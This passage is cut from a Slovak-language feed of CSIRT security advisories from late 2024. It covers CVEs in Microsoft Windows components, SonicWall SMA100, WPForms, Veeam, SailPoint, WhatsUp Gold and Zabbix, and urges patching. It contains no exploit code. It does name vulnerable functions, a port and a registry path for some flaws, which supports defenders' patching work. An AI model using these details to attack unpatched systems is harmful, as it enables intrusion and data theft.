<p>Komponent <strong>Windows Lightweight Directory Access Protocol (LDAP)</strong> obsahuje kritickú zraniteľnosť, ktorú by vzdialený neautentifikovaný útočník prostredníctvom <strong>špeciálne vytvorených volaní</strong> <strong>LDAP </strong>mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>. Pokusy o&nbsp;zneužitie zraniteľnosti je možné mitigovať aj blokovaním prichádzajúcich volaní RPC z&nbsp;nedôveryhodných sietí v&nbsp;nastaveniach doménového radiča.</p>



<p><strong>CVE-2024-49124, CVE-2024-49127</strong> (CVSS skóre 8,1)</p>



<p>Zraniteľnosti v<strong> Windows Lightweight Directory Access Protocol (LDAP) </strong>spočívajú v&nbsp;použití odalokovaného miesta v&nbsp;pamäti a v&nbsp;nesprávnej synchronizácii procesov pri prístupe ku&nbsp;zdieľaným zdrojom. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek mohol zneužiť na <strong>vzdialené vykonanie kódu</strong> s&nbsp;oprávneniami používateľa <strong>SYSTEM</strong>. Zneužitie zraniteľnosti vyžaduje, aby útočník vyhral súbeh procesov.</p>



<p><strong>CVE-2024-49117</strong> (CVSS skóre 8,8)</p>



<p>Zraniteľnosť v&nbsp;hypervízore <strong>Hyper-V</strong> spočíva v&nbsp;generovaní nesprávnych stavových kódov a&nbsp;možno ju zneužiť na <strong>vzdialené vykonanie kódu</strong> na hostiteľskom serveri. Zneužitie zraniteľnosti vyžaduje, aby autentifikovaný útočník z&nbsp;virtuálneho stroja (VM) zaslal špeciálne vytvorenú požiadavku pre manipuláciu so súbormi na hardvérové zdroje VM. Úspešné zneužitie zraniteľnosti môže viesť k&nbsp;tzv. <strong>cross-VM útoku</strong>, v&nbsp;rámci ktorého na hostiteľskom zariadení dochádza ku kompromitácii viacerých virtuálnych strojov.</p>



<p><strong>CVE-2024-49122, CVE-2024-49118</strong> (CVSS skóre 8,1)</p>



<p>Zraniteľnosti v&nbsp;komponente <strong>Microsoft Message Queuing (MSMQ)</strong> spočívajú v&nbsp;použití odalokovaného miesta v&nbsp;pamäti a&nbsp;umožňujú <strong>vzdialené vykonanie kódu</strong>. Zraniteľnosť je možné <strong>zneužiť zaslaním špeciálne vytvorených MSMQ paketov</strong> na MSMQ server. Úspešné zneužitie zraniteľnosti je časovo náročné, nakoľko vyžaduje, aby útočník vyhral súbeh procesov.</p>



<p><strong>CVE-2024-49126</strong> (CVSS skóre 8,1)</p>



<p><strong>Windows Local Security Authority Subsystem Service (LSASS)</strong> obsahuje zraniteľnosť spočívajúcu v&nbsp;použití odalokovaného miesta v&nbsp;pamäti a&nbsp;nedostatočnom zabezpečení citlivých údajov v pamäti. Vzdialený neautentifikovaný útočník by ju prostredníctvom špeciálnych sieťových volaní mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>. Úspešné zneužitie zraniteľnosti vyžaduje, aby útočník vyhral súbeh procesov.</p>



<p><strong>II. Aktívne zneužívané zraniteľnosti:</strong></p>



<p><strong>CVE-2024-49138</strong> (CVSS skóre 7,8)</p>



<p>Zraniteľnosť nachádzajúca sa v komponente <strong>Windows Common Log File System Driver</strong> spočíva v&nbsp;pretečení medzipamäte haldy a&nbsp;vzdialený autentifikovaný útočník by ju mohol zneužiť na <strong>eskaláciu privilégií</strong> na úroveň oprávnení <strong>SYSTEM</strong>. Zraniteľnosť v&nbsp;súčasnosti aktívne zneužívajú útočníci.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladné nasadenie decembrového balíka opráv na zraniteľné produkty spoločnosti Microsoft. Bližšie informácie nájdete </strong><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Dec"><strong>tu</strong></a><strong>.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Dec">https://msrc.microsoft.com/update-guide/releaseNote/2024-Dec</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49105">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49105</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49106">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49106</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49108">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49108</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49112">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49112</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49115">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49115</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49116">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49116</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49117">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49117</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49118">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49118</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49119">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49119</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49120">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49120</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49122">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49122</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49123">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49123</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49124">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49124</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49126">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49126</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49127">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49127</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49128">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49128</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49132">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49132</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49138">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49138</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1825/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti SSL-VPN v zariadeniach série SMA100 od spoločnosti SonicWall</title>
		<link>/posts/1821</link>
					<comments>/posts/1821#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 12 Dec 2024 12:02:29 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[SMA100]]></category>
		<category><![CDATA[SonicWall]]></category>
		<guid isPermaLink="false">/?p=1821</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/sonicwall-1.png" alt="" /></p>Spoločnosť SonicWall vydala bezpečnostné aktualizácie, ktoré opravujú 6 zraniteľností vo funkcionalite SSL-VPN zariadení série SMA100. Najzávažnejšie zraniteľnosti s označením CVE-2024-53703,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/sonicwall-1.png" alt="" /></p>
<p><strong>Spoločnosť SonicWall vydala bezpečnostné aktualizácie, ktoré opravujú 6 zraniteľností vo funkcionalite SSL-VPN zariadení série SMA100. Najzávažnejšie zraniteľnosti s označením CVE-2024-53703, CVE-2024-45318, CVE-2024-40763 a CVE-2024-38475 možno zneužiť na vzdialené vykonanie kódu a získanie neoprávneného prístupu k citlivým údajom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SSL-VPN v zariadeniach série SMA100 (SMA 200, 210, 400, 410 a 500v) vo verziách starších ako 10.2.1.14-75sv</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-45318, CVE-2024-53703 </strong>(CVSS skóre 8,1)</p>



<p>Pretečenie vyrovnávacej pamäte zásobníka vo webovom manažmentovom rozhraní (CVE-2024-45318) a&nbsp;knižnici <em>mod_httprp</em> v&nbsp;zabudovanom komponente Apache HTTP Server (CVE-2024-53703) možno zneužiť na <strong>vzdialené vykonanie kódu</strong>. Zraniteľnosť je možné zneužiť bez autentifikácie.</p>



<p><strong>CVE-2024-40763 </strong>(CVSS skóre 7,5)</p>



<p>Nesprávne využitie funkcie <em>strcpy</em> vedúce k&nbsp;pretečeniu medzipamäte haldy by vzdialený autentifikovaný útočník mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>CVE-2024-38475 </strong>(CVSS skóre 7,5)</p>



<p>Zraniteľnosť v&nbsp;zabudovanom komponente Apache HTTP Server spočívajúcu v&nbsp;nesprávnom ošetrovaní výstupov <em>mod_rewrite</em> by vzdialený neautentifikovaný útočník mohol zneužiť na mapovanie URL odkazov na systémové súbory, ktoré môže server poskytovať a&nbsp;<strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong>.</p>



<p>Ostatné zraniteľnosti možno zneužiť na obídenie mechanizmov autentifikácie založených na báze bezpečnostných certifikátov (CVE-2024-45319) a&nbsp;získanie záložných kódov generovaných prostredníctvom generátora pseudonáhodných čísel (CVE-2024-53702).</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Obídenie mechanizmov autentifikácie</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia zasiahnutých systémov na verziu 10.2.1.14-75sv alebo novšiu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0018">https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0018</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1821/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vysoko závažná zraniteľnosť v plugine WordPress WPForms</title>
		<link>/posts/1818</link>
					<comments>/posts/1818#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 12 Dec 2024 11:42:24 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[WPForms]]></category>
		<guid isPermaLink="false">/?p=1818</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/wpforms-1024x691.jpg" alt="" /></p>Vývojári WordPress pluginu WPForms vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2024-11205 možno vykonaním neoprávnených zmien v systéme zneužiť vrátenie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/wpforms-1024x691.jpg" alt="" /></p>
<p><strong>Vývojári WordPress pluginu WPForms vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2024-11205 možno vykonaním neoprávnených zmien v systéme zneužiť vrátenie platieb alebo zrušenie predplatného implementovaného prostredníctvom služby Stripe a spôsobiť tak finančné škody prevádzkovateľom zraniteľných webových stránok.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WordPress plugin WPForms vo verziách 1.8.4 až 1.9.2.1</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-11205 </strong>(CVSS skóre 8,5)</p>



<p>Vysoko závažná zraniteľnosť spočíva v&nbsp;chýbajúcej autorizácii vo funkcii <em>wpforms_is_admin_ajax()</em>, ktorá slúži na identifikáciu administrátorských AJAX volaní. V rámci triedy <em>SingleActionsHandler</em> zodpovednej za spracovanie platobných operácií prostredníctvom služby Stripe je táto funkcia používaná na sprístupnenie administrátorských funkcií <em>ajax_single_payment_refund()</em> a <em>ajax_single_payment_cancel()</em>. Vzdialený autentifikovaný útočník s oprávneniami úrovne Subscriber alebo vyššími by zraniteľnosť mohol zneužiť na vrátenie platieb alebo zrušenie predplatného a spôsobiť tak finančné škody prevádzkovateľom zraniteľných webových stránok.</p>



<p>Zraniteľnosť v&nbsp;rámci Wordfence Bug Bounty programu odhalil bezpečnostný výskumník vystupujúci pod aliasom <em>villu164</em>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnená zmena v&nbsp;systéme</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia zásuvného modulu WPForms na verziu 1.9.2.2.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.wordfence.com/blog/2024/12/6000000-wordpress-sites-protected-against-payment-refund-and-subscription-cancellation-vulnerability-in-wpforms-wordpress-plugin/">https://www.wordfence.com/blog/2024/12/6000000-wordpress-sites-protected-against-payment-refund-and-subscription-cancellation-vulnerability-in-wpforms-wordpress-plugin/</a></li>



<li><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforms-lite/wpforms-184-1921-missing-authorization-to-authenticated-subscriber-payment-refund-and-subscription-cancellation">https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforms-lite/wpforms-184-1921-missing-authorization-to-authenticated-subscriber-payment-refund-and-subscription-cancellation</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-11205">https://www.cve.org/CVERecord?id=CVE-2024-11205</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1818/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností november 2024</title>
		<link>/posts/1792</link>
					<comments>/posts/1792#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 06 Dec 2024 12:51:01 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1792</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci november 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných   udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci november 2024.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/12/2024_11_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 11/2024 PDF (647 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1792/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť manažmentového nástroja Veeam Service Provider Console</title>
		<link>/posts/1790</link>
					<comments>/posts/1790#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 06 Dec 2024 11:21:01 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Service Provider Console]]></category>
		<category><![CDATA[Veeam]]></category>
		<guid isPermaLink="false">/?p=1790</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>Spoločnosť Veeam vydala bezpečnostné aktualizácie nástroja Veeam Service Provider Console (VSPC), ktoré opravujú dve zraniteľnosti, z čoho jedna je označená...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>
<p><strong>Spoločnosť Veeam vydala bezpečnostné aktualizácie nástroja Veeam Service Provider Console (VSPC), ktoré opravujú dve zraniteľnosti, z čoho jedna je označená ako kritická. CVE-2024-42448 možno zneužiť na vzdialené vykonanie kódu na serveroch VSPC.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Veeam Service Provider Console 7.0.X</li>



<li>Veeam Service Provider Console 8.0.X</li>



<li>Veeam Service Provider Console 8.1.X staršej ako 8.1.0.21999</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-42448</strong> (CVSS skóre 9,9)</p>



<p>Bližšie nešpecifikovanú kritickú zraniteľnosť CVE-2024-42448 by vzdialený autentifikovaný útočník s prístupom k manažmentovým agentom VSPC mohol zneužiť na vzdialené vykonanie kódu na serveroch Veeam Service Provide Console.</p>



<p><strong>CVE-2024-42449</strong> (CVSS skóre 7,1)</p>



<p>Vysoko závažnú zraniteľnosť s identifikátorom CVE-2024-42449 možno zneužiť na získanie NTLM hashu servisného účtu servera VSPC a zmazanie súborov na serveri Veeam Service Provide Console.</p>



<p><strong>Pozn.: Úspešné zneužitie zraniteľností vyžaduje autorizáciu zneužitých agentov na cieľových VSPC serveroch.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu<span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:
     Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:SK"></span></strong></li>



<li><strong>Neoprávnený prístup k citlivým údajom</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Výrobca odporúča používať len verzie s platnou technickou podporou a zasiahnuté systémy aktualizovať na verziu 8.1.0.21999.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.veeam.com/kb4679">https://www.veeam.com/kb4679</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-rce-bug-in-service-provider-console/">https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-rce-bug-in-service-provider-console/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1790/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v IAM systéme SailPoint IdentityIQ</title>
		<link>/posts/1786</link>
					<comments>/posts/1786#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 06 Dec 2024 11:15:47 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=1786</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/sailpoint-logo-1024x631.png" alt="" /></p>Spoločnosť SailPoint vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v produkte IdentityIQ. Jedná sa o IAM (Identity and Access Management) platformu pre...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/sailpoint-logo-1024x631.png" alt="" /></p>
<p><strong>Spoločnosť SailPoint vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v produkte IdentityIQ. Jedná sa o IAM (Identity and Access Management) platformu pre overovanie identity používateľov. CVE-2024-10905 možno zneužiť na získanie neoprávneného prístupu k citlivým údajom a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SailPoint IdentityIQ 8.4 vo verziách starších ako 8.4p2</li>



<li>SailPoint IdentityIQ 8.3 vo verziách starších ako 8.3p5</li>



<li>SailPoint IdentityIQ 8.2 vo verziách starších ako 8.2p8</li>



<li>SailPoint IdentityIQ vo verziách starších ako 8.2</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-10905</strong> (CVSS skóre 10,0)</p>



<p>Bližšie nešpecifikovaná zraniteľnosť s označením CVE-2024-10905 spočíva v nesprávnom narábaní s názvami súborov a vzdialený neautorizovaný útočník by ju zaslaním špeciálne vytvorených HTTP požiadaviek mohol zneužiť na získanie neoprávneného prístupu k citlivým údajom (obsahu zložky) aplikácie. Údaje možno následne zneužiť na úplné narušenie dôvernosti, integrity a dostupnosti systému.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k citlivým údajom</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov na verzie 8.4p2, 8.3p5 alebo 8.2p8.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-10905">https://nvd.nist.gov/vuln/detail/CVE-2024-10905</a></li>



<li><a href="https://thehackernews.com/2024/12/critical-sailpoint-identityiq.html">https://thehackernews.com/2024/12/critical-sailpoint-identityiq.html<span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://www.theregister.com/2024/12/03/sailpoint_identityiq_vulnerability">https://www.theregister.com/2024/12/03/sailpoint_identityiq_vulnerability</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1786/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Bezpečnostní výskumníci zverejnili PoC kód pre zneužitie kritickej zraniteľnosti v Progress WhatsUp Gold</title>
		<link>/posts/1782</link>
					<comments>/posts/1782#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 06 Dec 2024 11:11:30 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[WhatsUp Gold]]></category>
		<guid isPermaLink="false">/?p=1782</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/1809531504997563.png" alt="" /></p>Bezpečnostní výskumníci zo spoločnosti Tenable zverejnili proof-of-concept kód demonštrujúci postup zneužitia kritickej zraniteľnosti v produkte Progress WhatsUp Gold, ktorá bola...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/1809531504997563.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci zo spoločnosti Tenable zverejnili proof-of-concept kód demonštrujúci postup zneužitia kritickej zraniteľnosti v produkte Progress WhatsUp Gold, ktorá bola opravená aktualizáciami zo septembra 2024. CVE-2024-8785 možno zneužiť na vykonanie neoprávnených zmien v systéme a následné vykonanie škodlivého kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Progress WhatsUp Gold vo verziách starších ako 24.0.1 (od verzie 23.1.0)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-8785</strong> (CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť spočíva v nedostatočnom overovaní používateľských vstupov vo funkcii <em>UpdateFailoverRegistryValues</em> v rámci sieťového manažmentového API, ktoré vytvára proces <em>NmAPI.exe</em>. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek na port 9643 mohol zneužiť na vytvorenie nových alebo modifikáciu obsahu existujúcich Windows registrov v <em>HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\</em>. <strong>Modifikácia špecifických registrov definujúcich umiestnenie konfiguračných súborov aplikácie umožňuje vykonanie neoprávnených zmien v konfigurácii systému a vzdialené vykonanie kódu.</strong></p>



<p><strong>Pozn.: Spoločnosť Progress v rámci aktualizácií zo septembra 2024 opravila aj ďalšie bezpečnostné zraniteľnosti.</strong> Kritická zraniteľnosť <strong>CVE-2024-46909</strong> umožňovala vzdialené vykonanie kódu. Vysoko závažné zraniteľnosti s označením <strong>CVE-2024-46908</strong>, <strong>CVE-2024-46907</strong>, <strong>CVE-2024-46906</strong> a <strong>CVE-2024-46905</strong> by vzdialený autentifikovaný útočník prostredníctvom SQL injekcie mohol zneužiť na <strong>eskaláciu privilégií</strong> na úroveň oprávnení administrátora.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnená zmena v systéme</strong></li>



<li><strong><span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:
     Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:SK"></span>Vzdialené vykonanie kódu<span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:
     Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:SK"></span></strong></li>



<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov na verziu 24.0.1 alebo novšiu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.bleepingcomputer.com/news/security/exploit-released-for-critical-whatsup-gold-rce-flaw-patch-now/">https://www.bleepingcomputer.com/news/security/exploit-released-for-critical-whatsup-gold-rce-flaw-patch-now/</a></li>



<li><a href="https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-September-2024">https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-September-2024</a></li>



<li><a href="https://www.tenable.com/security/research/tra-2024-48">https://www.tenable.com/security/research/tra-2024-48</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1782/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v monitorovacej platforme Zabbix</title>
		<link>/posts/1775</link>
					<comments>/posts/1775#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 29 Nov 2024 15:40:54 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1775</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Zabbix_logo_square.svg_-1024x726.png" alt="" /></p>Vývojári monitorovacej platformy Zabbix vydali bezpečnostné aktualizácie, ktoré opravujú 4 zraniteľnosti, z čoho 2 sú označené ako kritické. Kritické zraniteľnosti s identifikátormi...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Zabbix_logo_square.svg_-1024x726.png" alt="" /></p>
<p><strong>Vývojári monitorovacej platformy Zabbix vydali bezpečnostné aktualizácie, ktoré opravujú 4 zraniteľnosti, z čoho 2 sú označené ako kritické. Kritické zraniteľnosti s identifikátormi CVE-2024-42330 a CVE-2024-42327 možno zneužiť na eskaláciu privilégií, vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Zabbix 5.0.X vo verziách starších ako 5.0.43rc1</li>



<li>Zabbix 6.0.X vo verziách starších ako 6.0.34rc1</li>



<li>Zabbix 6.4.X vo verziách starších ako 6.4.19rc1</li>



<li>Zabbix 7.0.X vo verziách starších ako 7.0.4rc1</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-42330</strong> (CVSS skóre 9,1)</p>



<p>Kritická zraniteľnosť v komponente Server spočíva v nedostatočnom overovaní polí HTTP hlavičiek a vzdialený autentifikovaný útočník by ju mohol zneužiť na získanie prístupu ku skrytým vlastnostiam objektov a vzdialené vykonanie kódu.</p>



<p><strong>CVE-2024-42327</strong> (CVSS skóre 9,9)</p>



<p>CVE-2024-42327 spočíva v nedostatočnom overovaní používateľských vstupov v rámci funkcie <em>CUser.get</em>. Vzdialený autentifikovaný útočník s oprávneniami umožňujúcimi prístup k API rozhraniu by ju prostredníctvom SQL injekcie mohol zneužiť na eskaláciu privilégií a na získanie úplnej kontroly nad systémom.</p>



<p>Vysoko závažné zraniteľnosti s označením <strong>CVE-2024-36466</strong> a <strong>CVE-2024-36467</strong> možno zneužiť na získanie neoprávneného prístupu do systému a eskaláciu privilégií.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k citlivým údajom</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



